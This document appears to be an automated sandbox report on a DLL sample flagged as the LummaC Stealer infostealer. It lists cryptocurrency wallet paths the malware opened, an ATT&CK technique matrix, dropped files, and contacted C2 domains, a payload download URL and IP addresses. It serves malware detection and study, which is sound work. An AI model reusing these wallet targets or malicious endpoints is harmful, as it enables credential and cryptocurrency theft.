Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN

Source: Yara match

File source: Process Memory Space: aspnet_regiis.exe PID: 8084, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 8084, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	2 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	311 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	Logon Script (Windows)	Logon Script (Windows)	41 Obfuscated Files or Information	Security Account Manager	33 System Information Discovery	SMB/Windows Admin Shares	2 Clipboard Data	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Software Packing	NTDS	351 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	124 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Rundll32	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SystemCoreHelper.dll	18%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\gdi32.dll	100%	Joe Sandbox ML
C:\Windows\Temp\zbjnkzvo4cc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.dll	100%	Joe Sandbox ML
C:\Windows\Temp\mxtvcgq32fe.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.dll	100%	Joe Sandbox ML
C:\Windows\Temp\mxtvcgq32fe.exe	26%	ReversingLabs	Win32.Infostealer.Generic
C:\Windows\Temp\zbjnkzvo4cc.exe	26%	ReversingLabs	Win32.Infostealer.Generic

Source	Detection	Scanner	Label
https://frogs-severz.sbs/apibubM	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/api	0%	Avira URL Cloud	safe
http://crl.micro/	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/((	0%	Avira URL Cloud	safe
https://revirepart.biz/	100%	Avira URL Cloud	malware
http://www.microsoft.co1	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/9	0%	Avira URL Cloud	safe
http://192.81.132.76/b.exe	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/api7M	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/apis	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/apiV	0%	Avira URL Cloud	safe
http://192.81.132.76	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/	0%	Avira URL Cloud	safe
http://www.microsoft.cou	0%	Avira URL Cloud	safe
https://frogs-severz.sbs:443/api	0%	Avira URL Cloud	safe
https://ipinfo.i	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/s	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ipinfo.io	34.117.59.81	true	false	high
frogs-severz.sbs	104.21.88.250	true	true	unknown
revirepart.biz	172.67.184.174	true	false	high
api.telegram.org	149.154.167.220	true	false	high
pastebin.com	104.20.3.235	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://frogs-severz.sbs/api	true	Avira URL Cloud: safe	unknown
https://revirepart.biz/api	false		high
http://192.81.132.76/b.exe	true	Avira URL Cloud: safe	unknown
https://ipinfo.io/country	false		high
revirepart.biz	false		high
https://pastebin.com/raw/NQfY14gm	false		high
https://ipinfo.io/ip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://frogs-severz.sbs/api7M	aspnet_regiis.exe, 0000001A.00000003.2094821646.0000000004CE8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	rundll32.exe, 0000000A.00000002.2603536788.0000000005031000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2604425013.0000000007490000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 0000000B.00000002.1743928726.00000000056B1000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000B.00000003.1743019930.0000000007391000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 0000000B.00000003.1742462510.00000000056B0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000B.00000003.1742259458.00000000056AA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://go.microsoft.co	powershell.exe, 00000022.00000002.2296676818.00000000079F0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://revirepart.biz/	aspnet_regiis.exe, 0000001A.00000003.1953259118.0000000002926000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contoso.com/License	powershell.exe, 00000028.00000002.2444137718.00000000061F5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	aspnet_regiis.exe, 0000001A.00000003.2023316255.0000000004D36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023048745.0000000004D36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2001459503.0000000004D82000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2001705783.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs/apibubM	aspnet_regiis.exe, 0000001A.00000002.2132988943.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micro/	powershell.exe, 00000028.00000002.2456306228.0000000007881000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pastebin.com/raw/nqfy14gm	powershell.exe, 00000013.00000002.1895365190.0000000000860000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pastebin.com/rawNQfY14gm	powershell.exe, 00000011.00000002.1885257880.0000000000E1F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1930333354.0000000006BBF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io/iphZ_l	powershell.exe, 00000022.00000002.2258625366.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.00000000056B5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs/apis	aspnet_regiis.exe, 0000001A.00000002.2132988943.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	aspnet_regiis.exe, 0000001A.00000003.2001705783.0000000004D11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co1	powershell.exe, 00000008.00000002.1754027788.0000000007C12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000028.00000002.2444137718.00000000061F5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000008.00000002.1749981425.00000000060CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1779208319.000000000567B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1903260944.000000000607A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1924834507.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2287144047.00000000063E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2326060060.00000000065C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2411478791.0000000005894000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2444137718.00000000061F5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs/((	aspnet_regiis.exe, 0000001A.00000003.2023661770.0000000004CEE000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023545300.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023355458.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://frogs-severz.sbs/9	aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	aspnet_regiis.exe, 0000001A.00000003.2046498358.0000000004E04000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	rundll32.exe, 00000003.00000002.2634374806.00000000048E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1745042704.0000000005061000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2603536788.0000000005031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1771978145.0000000004611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.0000000005011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000004641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2258625366.0000000005381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.0000000005561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.0000000004831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.0000000005191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000008.00000002.1749981425.00000000060CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1779208319.000000000567B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1903260944.000000000607A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1924834507.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2287144047.00000000063E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2326060060.00000000065C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2411478791.0000000005894000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2444137718.00000000061F5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.81.132.76	powershell.exe, 00000011.00000002.1887480681.0000000005472000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000005232000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/countryhZ_l	powershell.exe, 00000026.00000002.2353438766.0000000004986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.00000000052E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000028.00000002.2375932541.00000000052E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000008.00000002.1745042704.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1771978145.0000000004766000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000028.00000002.2375932541.00000000052E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs/apiV	aspnet_regiis.exe, 0000001A.00000002.2132988943.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2123496041.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000008.00000002.1745042704.00000000057B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.0000000005493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000004796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2258625366.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.0000000005906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.0000000005007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.0000000005530000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ipinfo.io	powershell.exe, 00000022.00000002.2258625366.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.00000000058CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.000000000532D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.00000000054F6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000028.00000002.2444137718.00000000061F5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.cou	powershell.exe, 00000011.00000002.1912945547.00000000077CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	aspnet_regiis.exe, 0000001A.00000003.2023316255.0000000004D36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023048745.0000000004D36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2001459503.0000000004D82000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2001705783.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	aspnet_regiis.exe, 0000001A.00000003.2046498358.0000000004E04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000028.00000002.2375932541.00000000052E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ipinfo.io	powershell.exe, 00000022.00000002.2258625366.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.00000000056B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.0000000005007000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs:443/api	aspnet_regiis.exe, 0000001A.00000003.2000438756.000000000296D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2094821646.0000000004CE8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000002.2131149619.00000000028E6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.mi	powershell.exe, 0000000F.00000002.1784830664.0000000007082000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs/	aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lBdq	powershell.exe, 00000008.00000002.1745042704.0000000005061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1771978145.0000000004611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.0000000005011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000004641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2258625366.0000000005381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.0000000005561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.0000000004831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.0000000005191000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	aspnet_regiis.exe, 0000001A.00000003.2001459503.0000000004D84000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000008.00000002.1745042704.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1771978145.0000000004766000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs/s	aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.i	powershell.exe, 00000022.00000002.2258625366.0000000005EBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.0000000005906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.0000000005368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.0000000005530000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	aspnet_regiis.exe, 0000001A.00000003.2001705783.0000000004D11000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pastebin.com	powershell.exe, 00000011.00000002.1887480681.000000000540D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.00000000053A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000005167000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.00000000051CD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastebin.com	powershell.exe, 00000011.00000002.1887480681.00000000053A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.0000000005369000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.00000000051AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000005164000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000004796000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.20.3.235	pastebin.com	United States	13335	CLOUDFLARENETUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
34.117.59.81	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
192.81.132.76	unknown	United States	63949	LINODE-APLinodeLLCUS	true
172.67.184.174	revirepart.biz	United States	13335	CLOUDFLARENETUS	false
104.21.88.250	frogs-severz.sbs	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561436
Start date and time:	2024-11-23 12:46:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	47
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SystemCoreHelper.dll
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDLL@60/52@5/6
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 90% Number of executed functions: 148 Number of non-executed functions: 69
Cookbook Comments:	Found application associated with file extension: .dll

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 3512 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5436 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7516 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7664 because it is empty
Execution Graph export aborted for target rundll32.exe, PID 3120 because it is empty
Execution Graph export aborted for target rundll32.exe, PID 7188 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: SystemCoreHelper.dll

Simulations

Behavior and APIs

Time	Type	Description
06:47:01	API Interceptor	251x Sleep call for process: powershell.exe modified
06:47:03	API Interceptor	1x Sleep call for process: loaddll32.exe modified
06:47:27	API Interceptor	7x Sleep call for process: aspnet_regiis.exe modified
06:47:50	API Interceptor	2x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
